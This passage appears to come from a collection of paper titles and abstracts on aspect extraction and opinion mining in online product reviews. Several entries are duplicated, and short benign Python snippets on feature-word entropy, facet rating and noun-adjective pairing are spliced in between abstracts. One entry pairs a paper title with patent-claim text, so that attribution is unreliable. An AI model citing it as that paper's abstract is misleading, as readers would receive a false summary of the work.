We therefore propose a novel approach by generalizing syntactic structures of the product attributes with two strategies: intuitive heuristics and syntactic structure similarity. Experiments show that the proposed approach is effective. --- paper_title: Aspect Term Extraction with History Attention and Selective Transformation paper_content: Aspect Term Extraction (ATE), a key sub-task in Aspect-Based Sentiment Analysis, aims to extract explicit aspect expressions from online user reviews. We present a new framework for tackling ATE. It can exploit two useful clues, namely opinion summary and aspect detection history. Opinion summary is distilled from the whole input sentence, conditioned on each current token for aspect prediction, and thus the tailor-made summary can help aspect prediction on this token. Another clue is the information of aspect detection history, and it is distilled from the previous aspect predictions so as to leverage the coordinate structure and tagging schema constraints to upgrade the aspect prediction. Experimental results over four benchmark datasets clearly demonstrate that our framework can outperform all state-of-the-art methods. --- paper_title: Structure-Aware Review Mining and Summarization paper_content: In this paper, we focus on object feature based review summarization. Different from most of previous work with linguistic rules or statistical methods, we formulate the review mining task as a joint structure tagging problem. We propose a new machine learning framework based on Conditional Random Fields (CRFs). It can employ rich features to jointly extract positive opinions, negative opinions and object features for review sentences. The linguistic structure can be naturally integrated into model representation. Besides linear-chain structure, we also investigate conjunction structure and syntactic tree structure in this framework. Through extensive experiments on movie review and product review data sets, we show that structure-aware models outperform many state-of-the-art approaches to review mining. --- paper_title: A Joint Model of Text and Aspect Ratings for Sentiment Summarization paper_content: Online reviews are often accompanied with numerical ratings provided by users for a set of service or product aspects. We propose a statistical model which is able to discover corresponding topics in text and extract textual evidence from reviews supporting each of these aspect ratings ‐ a fundamental problem in aspect-based sentiment summarization (Hu and Liu, 2004a). Our model achieves high accuracy, without any explicitly labeled data except the user provided opinion ratings. The proposed approach is general and can be used for segmentation in other applications where sequential data is accompanied with correlated signals. --- paper_title: An Approach Based on Tree Kernels for Opinion Mining of Online Product Reviews paper_content: Opinion mining is a challenging task to identify the opinions or sentiments underlying user generated contents, such as online product reviews, blogs, discussion forums, etc. Previous studies that adopt machine learning algorithms mainly focus on designing effective features for this complex task. This paper presents our approach based on tree kernels for opinion mining of online product reviews. Tree kernels alleviate the complexity of feature selection and generate effective features to satisfy the special requirements in opinion mining. 
In this paper, we define several tree kernels for sentiment expression extraction and sentiment classification, which are subtasks of opinion mining. Our proposed tree kernels encode not only syntactic structure information, but also sentiment related information, such as sentiment boundary and sentiment polarity, which are important features for opinion mining. Experimental results on a benchmark data set indicate that tree kernels can significantly improve the performance of both sentiment expression extraction and sentiment classification. Besides, a linear combination of our proposed tree kernels and a traditional feature vector kernel achieves the best performance using the benchmark data set. --- paper_title: Dependency-Tree Based Convolutional Neural Networks for Aspect Term Extraction paper_content: Aspect term extraction is one of the fundamental subtasks in aspect-based sentiment analysis. Previous work has shown that sentences' dependency information is critical and has been widely used for opinion mining. With the recent success of deep learning in natural language processing (NLP), the recurrent neural network (RNN) has been proposed for aspect term extraction and shows superiority over feature-rich CRF-based models. However, because the RNN is a sequential model, it cannot effectively capture tree-based dependency information of sentences, thus limiting its practicability. In order to effectively exploit sentences' dependency information and leverage the effectiveness of deep learning, we propose a novel dependency-tree based convolutional stacked neural network (DTBCSNN) for aspect term extraction, in which tree-based convolution is introduced over sentences' dependency parse trees to capture syntactic features. Our model is an end-to-end deep learning based model and it does not need any human-crafted features. Furthermore, our model is flexible to incorporate extra linguistic features to further boost the model performance. To substantiate, results from experiments on the SemEval2014 Task4 datasets (reviews in the restaurant and laptop domains) show that our model achieves outstanding performance and outperforms the RNN and CRF baselines. --- paper_title: Mining Opinion Features in Customer Reviews. paper_content: Nowadays, E-commerce systems have become extremely important. Large numbers of customers are choosing online shopping because of its convenience, reliability, and cost. Client-generated information, and especially item reviews, are significant sources of data for consumers to make informed buying choices and for makers to keep track of customers' opinions. It is difficult for customers to make purchasing decisions based on only pictures and short product descriptions. On the other hand, mining product reviews has become a hot research topic, and prior research is mostly based on pre-specified product features to analyse the opinions. Natural Language Processing (NLP) techniques such as NLTK for Python can be applied to raw customer reviews and keywords can be extracted. This paper presents a survey on the techniques used for designing software to mine opinion features in reviews. Eleven IEEE papers are selected and a comparison is made between them. These papers are representative of the significant improvements in opinion mining in the past decade. --- paper_title: An Aspect-Sentiment Pair Extraction Approach Based on Latent Dirichlet Allocation paper_content: Online user reviews have a great influence on the decision-making process of customers and the product sales of companies.
However, it is very difficult to obtain user sentiments from the huge volume of data on the web; consequently, sentiment analysis has gained great importance for analyzing data automatically. On the other hand, sentiment analysis divides itself into branches and can be performed better with aspect-level analysis. In this paper, we propose to extract aspect-sentiment pairs from a Turkish review dataset. The proposed task is the fundamental and indeed the critical step of aspect-level sentiment analysis. While extracting aspect-sentiment pairs, an unsupervised topic model, Latent Dirichlet Allocation (LDA), is used. With LDA, aspect-sentiment pairs from user reviews are extracted with 0.86 average precision based on a ranked list. The aspect-sentiment pair extraction problem is realized for the first time with LDA on a real-world Turkish user review dataset. The experimental results show that LDA is effective and robust in aspect-sentiment pair extraction from user reviews. --- paper_title: Linguistic attention-based model for aspect extraction paper_content: Aspect extraction plays an important role in aspect-level sentiment analysis. Most existing approaches focus on explicit aspect extraction and either rely heavily on syntactic rules or only make use of neural networks without linguistic knowledge. This paper proposes a linguistic attention-based model (LABM) to implement explicit and implicit aspect extraction together. The linguistic attention mechanism incorporates knowledge of linguistics, which has proven to be very useful in aspect extraction. We also propose a novel unsupervised training approach, distributed aspect learning (DAL); the core idea of DAL is that the aspect vector should align closely with the neural word embeddings of nouns which are tightly associated with the valid aspect indicators. Experimental results using six datasets demonstrate that our model is explainable and outperforms baseline models on evaluation tasks. --- paper_title: Aspect Ranking: Identifying Important Product Aspects from Online Consumer Reviews paper_content: In this paper, we address the topic of aspect ranking, which aims to automatically identify important product aspects from online consumer reviews. The important aspects are identified according to two observations: (a) the important aspects of a product are usually commented on by a large number of consumers; and (b) consumers' opinions on the important aspects greatly influence their overall opinions on the product. In particular, given consumer reviews of a product, we first identify the product aspects by a shallow dependency parser and determine consumers' opinions on these aspects via a sentiment classifier. We then develop an aspect ranking algorithm to identify the important aspects by simultaneously considering the aspect frequency and the influence of consumers' opinions given to each aspect on their overall opinions. The experimental results on 11 popular products in four domains demonstrate the effectiveness of our approach. We further apply the aspect ranking results to the application of document-level sentiment classification, and improve the performance significantly. --- paper_title: Aspect and sentiment unification model for online review analysis paper_content: User-generated reviews on the Web contain sentiments about detailed aspects of products and services.
In this paper, we tackle the problem of automatically discovering what aspects are evaluated in reviews and how sentiments for different aspects are expressed. We first propose Sentence-LDA (SLDA), a probabilistic generative model that assumes all words in a single sentence are generated from one aspect. We then extend SLDA to Aspect and Sentiment Unification Model (ASUM), which incorporates aspect and sentiment together to model sentiments toward different aspects. ASUM discovers pairs of {aspect, sentiment} which we call senti-aspects. We applied SLDA and ASUM to reviews of electronic devices and restaurants. The results show that the aspects discovered by SLDA match evaluative details of the reviews, and the senti-aspects found by ASUM capture important aspects that are closely coupled with a sentiment. The results of sentiment classification show that ASUM outperforms other generative models and comes close to supervised classification methods. One important advantage of ASUM is that it does not require any sentiment labels of the reviews, which are often expensive to obtain. --- paper_title: Opinion–Aspect Relations in Cognizing Customer Feelings via Reviews paper_content: Determining a consensus opinion on a product sold online is no longer easy, because assessments have become more and more numerous on the Internet. To address this problem, researchers have used various approaches, such as looking for feelings expressed in the documents and exploring the appearance and syntax of reviews. Aspect-based evaluation is the most important aspect of opinion mining, and researchers are becoming more interested in product aspect extraction; however, more complex algorithms are needed to address this issue precisely with large data sets. This paper introduces a method to extract and summarize product aspects and corresponding opinions from a large number of product reviews in a specific domain. We maximize the accuracy and usefulness of the review summaries by leveraging knowledge about product aspect extraction and providing both an appropriate level of detail and rich representation capabilities. The results show that the proposed system achieves F1-scores of 0.714 for camera reviews and 0.774 for laptop reviews. --- paper_title: Double Embeddings and CNN-based Sequence Labeling for Aspect Extraction paper_content: One key task of fine-grained sentiment analysis of product reviews is to extract product aspects or features that users have expressed opinions on. This paper focuses on supervised aspect extraction using deep learning. Unlike other highly sophisticated supervised deep learning models, this paper proposes a novel and yet simple CNN model employing two types of pre-trained embeddings for aspect extraction: general-purpose embeddings and domain-specific embeddings. Without using any additional supervision, this model achieves surprisingly good results, outperforming state-of-the-art sophisticated existing methods. To our knowledge, this paper is the first to report such double embeddings based CNN model for aspect extraction and achieve very good results. --- paper_title: Extracting Product Features And Opinions From Reviews paper_content: Consumers are often forced to wade through many on-line reviews in order to make an informed product choice. 
This paper introduces Opine, an unsupervised information-extraction system which mines reviews in order to build a model of important product features, their evaluation by reviewers, and their relative quality across products.Compared to previous work, Opine achieves 22% higher precision (with only 3% lower recall) on the feature extraction task. Opine's novel use of relaxation labeling for finding the semantic orientation of words in context leads to strong performance on the tasks of finding opinion phrases and their polarity. --- paper_title: Aspect ontology based review exploration paper_content: Abstract User feedback in the form of customer reviews, blogs, and forum posts is an essential feature of e-commerce. Users often read online product reviews to get an insight into the quality of various aspects of a product. Besides, users have different aspect preferences, and they look for reviews that contain relevant information regarding their preferred aspect(s). However, as reviews are unstructured and voluminous, it becomes exhaustive and laborious for users to find relevant reviews. Lack of domain knowledge about various aspects and sub-aspects of a product, and how they are related to each other, also add to the problem. Although this information could be there in product reviews, it is not easy for users to spot it instantly from the reviews. This paper seeks to address the above problems and presents two novel algorithms that summarize product reviews, and provides an interactive search interface, similar to popular faceted navigation. We solve the problem by creating an aspect ontology tree with high aspect extraction precision. --- paper_title: Red Opal: product-feature scoring from reviews paper_content: Online shoppers are generally highly task-driven: they have a certain goal in mind, and they are looking for a product with features that are consistent with that goal. Unfortunately, finding a product with specific features is extremely time-consuming using the search functionality provided by existing web sites.In this paper, we present a new search system called Red Opal that enables users to locate products rapidly based on features. Our fully automatic system examines prior customer reviews, identifies product features, and scores each product on each feature. Red Opal uses these scores to determine which products to show when a user specifies a desired product feature. We evaluate our system on four dimensions: precision of feature extraction, efficiency of feature extraction, precision of product scores, and estimated time savings to customers. On each dimension, Red Opal performs better than a comparison system. --- paper_title: Generalizing Syntactic Structures for Product Attribute Candidate Extraction paper_content: Noun phrases (NP) in a product review are always considered as the product attribute candidates in previous work. However, this method limits the recall of the product attribute extraction. We therefore propose a novel approach by generalizing syntactic structures of the product attributes with two strategies: intuitive heuristics and syntactic structure similarity. Experiments show that the proposed approach is effective. --- paper_title: Opinion observer: analyzing and comparing opinions on the Web paper_content: The Web has become an excellent source for gathering consumer opinions. There are now numerous Web sites containing such opinions, e.g., customer reviews of products, forums, discussion groups, and blogs. 
This paper focuses on online customer reviews of products. It makes two contributions. First, it proposes a novel framework for analyzing and comparing consumer opinions of competing products. A prototype system called Opinion Observer is also implemented. The system is such that with a single glance of its visualization, the user is able to clearly see the strengths and weaknesses of each product in the minds of consumers in terms of various product features. This comparison is useful to both potential customers and product manufacturers. For a potential customer, he/she can see a visual side-by-side and feature-by-feature comparison of consumer opinions on these products, which helps him/her to decide which product to buy. For a product manufacturer, the comparison enables it to easily gather marketing intelligence and product benchmarking information. Second, a new technique based on language pattern mining is proposed to extract product features from Pros and Cons in a particular type of reviews. Such features form the basis for the above comparison. Experimental results show that the technique is highly effective and outperform existing methods significantly. --- paper_title: Extracting and Ranking Product Features in Opinion Documents paper_content: An important task of opinion mining is to extract people's opinions on features of an entity. For example, the sentence, "I love the GPS function of Motorola Droid" expresses a positive opinion on the "GPS function" of the Motorola phone. "GPS function" is the feature. This paper focuses on mining features. Double propagation is a state-of-the-art technique for solving the problem. It works well for medium-size corpora. However, for large and small corpora, it can result in low precision and low recall. To deal with these two problems, two improvements based on part-whole and "no" patterns are introduced to increase the recall. Then feature ranking is applied to the extracted feature candidates to improve the precision of the top-ranked candidates. We rank feature candidates by feature importance which is determined by two factors: feature relevance and feature frequency. The problem is formulated as a bipartite graph and the well-known web page ranking algorithm HITS is used to find important features and rank them high. Experiments on diverse real-life datasets show promising results. --- paper_title: Automatic Extraction for Product Feature Words from Comments on the Web paper_content: Before deciding to buy a product, many people tend to consult others' opinions on it. Web provides a perfect platform which one can get information to find out the advantages and disadvantages of the product of his interest. How to automatically manage the numerous opinionated documents and then to give suggestions to the potential customers is becoming a research hotspot recently. Constructing a sentiment resource is one of the vital elements of opinion finding and polarity analysis tasks. For a specific domain, the sentiment resource can be regarded as a dictionary, which contains a list of product feature words and several opinion words with sentiment polarity for each feature word. This paper proposes an automatic algorithm to extraction feature words and opinion words for the sentiment resource. We mine the feature words and opinion words from the comments on the Web with both NLP technique and statistical method. 
Left context entropy is proposed to extract unknown feature words; Adjective rules and background corpus are taken into consideration in the algorithm. Experimental results show the effectiveness of the proposed automatic sentiment resource construction approach. The proposed method that combines NLP and statistical techniques is better than using only NLP-based technique. Although the experiment is built on mobile telephone comments in Chinese, the algorithm is domain independent. --- paper_title: Mining Opinion Features in Customer Reviews. paper_content: Now days, E-commerce systems have become extremely important. Large numbers of customers are choosing online shopping because of its convenience, reliability, and cost. Client generated information and especially item reviews are significant sources of data for consumers to make informed buy choices and for makers to keep track of customer’s opinions. It is difficult for customers to make purchasing decisions based on only pictures and short product descriptions. On the other hand, mining product reviews has become a hot research topic and prior researches are mostly based on pre-specified product features to analyse the opinions. Natural Language Processing (NLP) techniques such as NLTK for Python can be applied to raw customer reviews and keywords can be extracted. This paper presents a survey on the techniques used for designing software to mine opinion features in reviews. Elven IEEE papers are selected and a comparison is made between them. These papers are representative of the significant improvements in opinion mining in the past decade. --- paper_title: Opinion–Aspect Relations in Cognizing Customer Feelings via Reviews paper_content: Determining a consensus opinion on a product sold online is no longer easy, because assessments have become more and more numerous on the Internet. To address this problem, researchers have used various approaches, such as looking for feelings expressed in the documents and exploring the appearance and syntax of reviews. Aspect-based evaluation is the most important aspect of opinion mining, and researchers are becoming more interested in product aspect extraction; however, more complex algorithms are needed to address this issue precisely with large data sets. This paper introduces a method to extract and summarize product aspects and corresponding opinions from a large number of product reviews in a specific domain. We maximize the accuracy and usefulness of the review summaries by leveraging knowledge about product aspect extraction and providing both an appropriate level of detail and rich representation capabilities. The results show that the proposed system achieves F1-scores of 0.714 for camera reviews and 0.774 for laptop reviews. 
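The left-context-entropy cue described in the feature-word extraction entry above can be made concrete with a short sketch: a candidate term that is preceded by many different words across a review corpus receives a high entropy score and is kept as a feature-word candidate. The function name and toy corpus below are illustrative assumptions, not code from the cited work.

```python
from collections import Counter
from math import log2

def left_context_entropy(candidate, tokenized_reviews):
    """Entropy of the words appearing immediately to the left of a
    candidate feature word across a tokenized review corpus."""
    left_counts = Counter()
    for tokens in tokenized_reviews:
        for i, tok in enumerate(tokens):
            if tok == candidate and i > 0:
                left_counts[tokens[i - 1]] += 1
    total = sum(left_counts.values())
    if total == 0:
        return 0.0
    return -sum((c / total) * log2(c / total) for c in left_counts.values())

# Toy usage: terms with diverse left contexts score higher and are more
# likely to be genuine product feature words.
reviews = [
    "the screen is bright".split(),
    "a sharp screen indeed".split(),
    "this screen looks great".split(),
    "the screen scratches easily".split(),
]
print(left_context_entropy("screen", reviews))  # ~1.5 bits on this toy corpus
```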
--- paper_title: An Unsupervised Neural Attention Model for Aspect Extraction paper_content: Methods, systems, and computer-readable storage media for receiving a vocabulary, the vocabulary including text data that is provided as at least a portion of raw data, the raw data being provided in a computer-readable file, associating each word in the vocabulary with a feature vector, providing a sentence embedding for each sentence of the vocabulary based on a plurality of feature vectors to provide a plurality of sentence embeddings, providing a reconstructed sentence embedding for each sentence embedding based on a weighted parameter matrix to provide a plurality of reconstructed sentence embeddings, and training the unsupervised neural attention model based on the sentence embeddings and the reconstructed sentence embeddings to provide a trained neural attention model, the trained neural attention model being used to automatically determine aspects from the vocabulary. --- paper_title: Summarizing Opinions: Aspect Extraction Meets Sentiment Prediction and They Are Both Weakly Supervised paper_content: We present a neural framework for opinion summarization from online product reviews which is knowledge-lean and only requires light supervision (e.g., in the form of product domain labels and user-provided ratings). Our method combines two weakly supervised components to identify salient opinions and form extractive summaries from multiple reviews: an aspect extractor trained under a multi-task objective, and a sentiment predictor based on multiple instance learning. We introduce an opinion summarization dataset that includes a training set of product reviews from six diverse domains and human-annotated development and test sets with gold standard aspect annotations, salience labels, and opinion summaries. Automatic evaluation shows significant improvements over baselines, and a large-scale study indicates that our opinion summaries are preferred by human judges according to multiple criteria. --- paper_title: Aspect Ranking: Identifying Important Product Aspects from Online Consumer Reviews paper_content: In this paper, we dedicate to the topic of aspect ranking, which aims to automatically identify important product aspects from online consumer reviews. The important aspects are identified according to two observations: (a) the important aspects of a product are usually commented by a large number of consumers; and (b) consumers' opinions on the important aspects greatly influence their overall opinions on the product. In particular, given consumer reviews of a product, we first identify the product aspects by a shallow dependency parser and determine consumers' opinions on these aspects via a sentiment classifier. We then develop an aspect ranking algorithm to identify the important aspects by simultaneously considering the aspect frequency and the influence of consumers' opinions given to each aspect on their overall opinions. The experimental results on 11 popular products in four domains demonstrate the effectiveness of our approach. We further apply the aspect ranking results to the application of document-level sentiment classification, and improve the performance significantly. --- paper_title: An Unsupervised Approach to Product Attribute Extraction paper_content: Product Attribute Extraction is the task of automatically discovering attributes of products from text descriptions. 
In this paper, we propose a new approach which is both unsupervised and domain independent to extract the attributes. With our approach, we are able to achieve 92% precision and 62% recall in our experiments. Our experiments with varying dataset sizes show the robustness of our algorithm. We also show that even a minimum of 5 descriptions provide enough information to identify attributes. --- paper_title: Secondhand seller reputation in online markets: A text analytics framework paper_content: Abstract With the rapid development of e-commerce, a new type of secondhand e-commerce website has appeared in recent years. Any user can have his or her own shop and list superfluous items for sale online without much supervision. These secondhand e-commerce platforms maximize the economic value of secondhand markets online, but buyers risk conducting unpleasant transactions with low-reputation sellers. The main contribution of our research is the design of a text analytics framework to assess secondhand sellers' reputation. In addition, we develop a new aspect-extraction method that combines the results of domain ontology and topic modeling to extract topical features from product descriptions. We conduct our experiments based on a real-word dataset crawled from XianYu. The experimental results reveal that our ontology-based topic model method outperforms a traditional topic model method. Furthermore, the proposed framework performs well in different item categories. The managerial implication of our research is that potential buyers can prejudge the reputation of secondhand sellers when making purchase decisions. The results can support a more effective development of online secondhand markets. --- paper_title: Aspect Aware Optimized Opinion Analysis of Online Product Reviews paper_content: Now-a-days social media and micro blogging sites are the most popular form of communication. The most useful application on these platforms is Opinion mining or Sentiment classification of the users. Here, in this work an automated method has been proposed to analyze and summarize opinions on a product in a structured, product aspect based manner. The proposed method will help future potential buyers to acquire complete idea, from a comprehensible representation of the reviews, without going through all the reviews manually. --- paper_title: Multi-facet Rating of Product Reviews paper_content: Online product reviews are becoming increasingly available, and are being used more and more frequently by consumers in order to choose among competing products. Tools that rank competing products in terms of the satisfaction of consumers that have purchased the product before, are thus also becoming popular. We tackle the problem of rating (i.e., attributing a numerical score of satisfaction to) consumer reviews based on their textual content. We here focus on multi-facet review rating, i.e., on the case in which the review of a product (e.g., a hotel) must be rated several times, according to several aspects of the product (for a hotel: cleanliness, centrality of location, etc.). We explore several aspects of the problem, with special emphasis on how to generate vectorial representations of the text by means of POS tagging, sentiment analysis, and feature selection for ordinal regression learning. We present the results of experiments conducted on a dataset of more than 15,000 reviews that we have crawled from a popular hotel review site. 
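As a rough illustration of the per-facet rating setup in the multi-facet rating entry above, the sketch below fits a separate text regressor for one facet. It substitutes a plain ridge regressor and TF-IDF features for the ordinal-regression learners and POS-based representations discussed there, and the reviews, ratings, and facet are invented.

```python
# pip install scikit-learn
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import Ridge
from sklearn.pipeline import make_pipeline

# Tiny hypothetical training set: review text plus a 1-5 rating for a single
# facet (hotel cleanliness); a real system trains one such model per facet.
reviews = [
    "spotless room and a very clean bathroom",
    "the room was dirty and smelled of smoke",
    "reasonably tidy, though the carpet was stained",
]
cleanliness_ratings = [5, 1, 3]

facet_model = make_pipeline(TfidfVectorizer(ngram_range=(1, 2)), Ridge(alpha=1.0))
facet_model.fit(reviews, cleanliness_ratings)

print(facet_model.predict(["clean and tidy room"]))  # leans toward the high end
```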
--- paper_title: Mining and summarizing customer reviews paper_content: Merchants selling products on the Web often ask their customers to review the products that they have purchased and the associated services. As e-commerce is becoming more and more popular, the number of customer reviews that a product receives grows rapidly. For a popular product, the number of reviews can be in hundreds or even thousands. This makes it difficult for a potential customer to read them to make an informed decision on whether to purchase the product. It also makes it difficult for the manufacturer of the product to keep track and to manage customer opinions. For the manufacturer, there are additional difficulties because many merchant sites may sell the same product and the manufacturer normally produces many kinds of products. In this research, we aim to mine and to summarize all the customer reviews of a product. This summarization task is different from traditional text summarization because we only mine the features of the product on which the customers have expressed their opinions and whether the opinions are positive or negative. We do not summarize the reviews by selecting a subset or rewrite some of the original sentences from the reviews to capture the main points as in the classic text summarization. Our task is performed in three steps: (1) mining product features that have been commented on by customers; (2) identifying opinion sentences in each review and deciding whether each opinion sentence is positive or negative; (3) summarizing the results. This paper proposes several novel techniques to perform these tasks. Our experimental results using reviews of a number of products sold online demonstrate the effectiveness of the techniques. --- paper_title: Opinion digger: an unsupervised opinion miner from unstructured product reviews paper_content: Mining customer reviews (opinion mining) has emerged as an interesting new research direction. Most of the reviewing websites such as Epinions.com provide some additional information on top of the review text and overall rating, including a set of predefined aspects and their ratings, and a rating guideline which shows the intended interpretation of the numerical ratings. However, the existing methods have ignored this additional information. We claim that using this information, which is freely available, along with the review text can effectively improve the accuracy of opinion mining. We propose an unsupervised method, called Opinion Digger, which extracts important aspects of a product and determines the overall consumer's satisfaction for each, by estimating a rating in the range from 1 to 5. We demonstrate the improved effectiveness of our methods on a real life dataset that we crawled from Epinions.com. --- paper_title: Aspect Extraction Performance with POS Tag Pattern of Dependency Relation in Aspect-based Sentiment Analysis paper_content: The most important task in aspect-based sentiment analysis (ABSA) is the aspect and sentiment word extraction. It is a challenge to identify and extract each aspect and it specific associated sentiment word correctly in the review sentence that consists of multiple aspects with various polarities expressed for multiple sentiments. By exploiting the dependency relation between words in a review, the multiple aspects and its corresponding sentiment can be identified. However, not all types of dependency relation patterns are able to extract candidate aspect and sentiment word pairs. 
In this paper, a preliminary study was performed on the performance of different type of dependency relation with different POS tag patterns in pre-extracting candidate aspect from customer review. The result contributes to the identification of the specific type dependency relation with it POS tag pattern that lead to high aspect extraction performance. The combination of these dependency relations offers a solution for single aspect single sentiment and multi aspect multi sentiment cases. --- paper_title: An Approach Based on Tree Kernels for Opinion Mining of Online Product Reviews paper_content: Opinion mining is a challenging task to identify the opinions or sentiments underlying user generated contents, such as online product reviews, blogs, discussion forums, etc. Previous studies that adopt machine learning algorithms mainly focus on designing effective features for this complex task. This paper presents our approach based on tree kernels for opinion mining of online product reviews. Tree kernels alleviate the complexity of feature selection and generate effective features to satisfy the special requirements in opinion mining. In this paper, we define several tree kernels for sentiment expression extraction and sentiment classification, which are subtasks of opinion mining. Our proposed tree kernels encode not only syntactic structure information, but also sentiment related information, such as sentiment boundary and sentiment polarity, which are important features to opinion mining. Experimental results on a benchmark data set indicate that tree kernels can significantly improve the performance of both sentiment expression extraction and sentiment classification. Besides, a linear combination of our proposed tree kernels and traditional feature vector kernel achieves the best performances using the benchmark data set. --- paper_title: Mining Opinion Features in Customer Reviews. paper_content: Now days, E-commerce systems have become extremely important. Large numbers of customers are choosing online shopping because of its convenience, reliability, and cost. Client generated information and especially item reviews are significant sources of data for consumers to make informed buy choices and for makers to keep track of customer’s opinions. It is difficult for customers to make purchasing decisions based on only pictures and short product descriptions. On the other hand, mining product reviews has become a hot research topic and prior researches are mostly based on pre-specified product features to analyse the opinions. Natural Language Processing (NLP) techniques such as NLTK for Python can be applied to raw customer reviews and keywords can be extracted. This paper presents a survey on the techniques used for designing software to mine opinion features in reviews. Elven IEEE papers are selected and a comparison is made between them. These papers are representative of the significant improvements in opinion mining in the past decade. --- paper_title: Extracting Product Features And Opinions From Reviews paper_content: Consumers are often forced to wade through many on-line reviews in order to make an informed product choice. This paper introduces Opine, an unsupervised information-extraction system which mines reviews in order to build a model of important product features, their evaluation by reviewers, and their relative quality across products.Compared to previous work, Opine achieves 22% higher precision (with only 3% lower recall) on the feature extraction task. 
Opine's novel use of relaxation labeling for finding the semantic orientation of words in context leads to strong performance on the tasks of finding opinion phrases and their polarity. --- paper_title: ILDA: interdependent LDA model for learning latent aspects and their ratings from online product reviews paper_content: Today, more and more product reviews become available on the Internet, e.g., product review forums, discussion groups, and Blogs. However, it is almost impossible for a customer to read all of the different and possibly even contradictory opinions and make an informed decision. Therefore, mining online reviews (opinion mining) has emerged as an interesting new research direction. Extracting aspects and the corresponding ratings is an important challenge in opinion mining. An aspect is an attribute or component of a product, e.g. 'screen' for a digital camera. It is common that reviewers use different words to describe an aspect (e.g. 'LCD', 'display', 'screen'). A rating is an intended interpretation of the user satisfaction in terms of numerical values. Reviewers usually express the rating of an aspect by a set of sentiments, e.g. 'blurry screen'. In this paper we present three probabilistic graphical models which aim to extract aspects and corresponding ratings of products from online reviews. The first two models extend standard PLSI and LDA to generate a rated aspect summary of product reviews. As our main contribution, we introduce Interdependent Latent Dirichlet Allocation (ILDA) model. This model is more natural for our task since the underlying probabilistic assumptions (interdependency between aspects and ratings) are appropriate for our problem domain. We conduct experiments on a real life dataset, Epinions.com, demonstrating the improved effectiveness of the ILDA model in terms of the likelihood of a held-out test set, and the accuracy of aspects and aspect ratings. --- paper_title: Semantic dependent word pairs generative model for fine-grained product feature mining paper_content: In the field of opinion mining, extraction of fine-grained product feature is a challenging problem. Noun is the most important features to represent product features. Generative model such as the latent Dirichlet allocation (LDA) has been used for detecting keyword clusters in document corpus. As adjectives often dominate review corpus, they are often excluded from the vocabulary in such generative model for opinion sentiment analysis. On the other hand, adjectives provide useful context for noun features as they are often semantically related to the nouns. To take advantage of such semantic relations, dependency tree is constructed to extract pairs of noun and adjective with semantic dependency relation. We propose a semantic dependent word pairs generative model for pairs of noun and adjective for each sentence. Product features and their corresponding adjectives are simultaneously clustered into distinct groups which enable improved accuracy of product features as well as providing clustered adjectives. Experimental results demonstrated the advantage of our models with lower perplexity, average cluster entropies, compared to baseline models based on LDA. Highly semantic cohesive, descriptive and discriminative fine-grained product features are obtained automatically. 
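The noun-adjective dependency pairs that the word-pairs model above takes as input can be approximated with an off-the-shelf parser. The sketch below uses spaCy's amod and acomp relations as a stand-in for the paper's dependency-tree extraction step; it is a pre-processing approximation, not the generative model itself.

```python
# pip install spacy && python -m spacy download en_core_web_sm
import spacy

nlp = spacy.load("en_core_web_sm")

def noun_adjective_pairs(text):
    """Collect (noun, adjective) pairs linked by a dependency relation."""
    doc = nlp(text)
    pairs = []
    for tok in doc:
        # "blurry screen": adjective directly modifies the noun
        if tok.dep_ == "amod" and tok.head.pos_ == "NOUN":
            pairs.append((tok.head.text, tok.text))
        # "the screen is blurry": adjective predicated of the subject noun
        if tok.pos_ == "ADJ" and tok.dep_ == "acomp":
            subjects = [c for c in tok.head.children if c.dep_ == "nsubj"]
            pairs.extend((s.text, tok.text) for s in subjects)
    return pairs

print(noun_adjective_pairs("The blurry screen ruined an otherwise great camera."))
print(noun_adjective_pairs("The battery life is short but the lens is excellent."))
```

Such pairs can then be clustered or passed to a topic model so that aspect words and their describing adjectives are grouped together, as the entry above proposes.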
--- paper_title: An Unsupervised Aspect-Sentiment Model for Online Reviews paper_content: With the increase in popularity of online review sites comes a corresponding need for tools capable of extracting the information most important to the user from the plain text data. Due to the diversity in products and services being reviewed, supervised methods are often not practical. We present an unsuper-vised system for extracting aspects and determining sentiment in review text. The method is simple and flexible with regard to domain and language, and takes into account the influence of aspect on sentiment polarity, an issue largely ignored in previous literature. We demonstrate its effectiveness on both component tasks, where it achieves similar results to more complex semi-supervised methods that are restricted by their reliance on manual annotation and extensive knowledge sources. --- paper_title: Jointly Modeling Aspects and Opinions with a MaxEnt-LDA Hybrid paper_content: Discovering and summarizing opinions from online reviews is an important and challenging task. A commonly-adopted framework generates structured review summaries with aspects and opinions. Recently topic models have been used to identify meaningful review aspects, but existing topic models do not identify aspect-specific opinion words. In this paper, we propose a MaxEnt-LDA hybrid model to jointly discover both aspects and aspect-specific opinion words. We show that with a relatively small amount of training data, our model can effectively identify aspect and opinion words simultaneously. We also demonstrate the domain adaptability of our model. --- paper_title: Latent aspect rating analysis without aspect keyword supervision paper_content: Mining detailed opinions buried in the vast amount of review text data is an important, yet quite challenging task with widespread applications in multiple domains. Latent Aspect Rating Analysis (LARA) refers to the task of inferring both opinion ratings on topical aspects (e.g., location, service of a hotel) and the relative weights reviewers have placed on each aspect based on review content and the associated overall ratings. A major limitation of previous work on LARA is the assumption of pre-specified aspects by keywords. However, the aspect information is not always available, and it may be difficult to pre-define appropriate aspects without a good knowledge about what aspects are actually commented on in the reviews. In this paper, we propose a unified generative model for LARA, which does not need pre-specified aspect keywords and simultaneously mines 1) latent topical aspects, 2) ratings on each identified aspect, and 3) weights placed on different aspects by a reviewer. Experiment results on two different review data sets demonstrate that the proposed model can effectively perform the Latent Aspect Rating Analysis task without the supervision of aspect keywords. Because of its generality, the proposed model can be applied to explore all kinds of opinionated text data containing overall sentiment judgments and support a wide range of interesting application tasks, such as aspect-based opinion summarization, personalized entity ranking and recommendation, and reviewer behavior analysis. --- paper_title: Exploiting coherence for the simultaneous discovery of latent facets and associated sentiments paper_content: Facet-based sentiment analysis involves discovering the ::: latent facets, sentiments and their associations. 
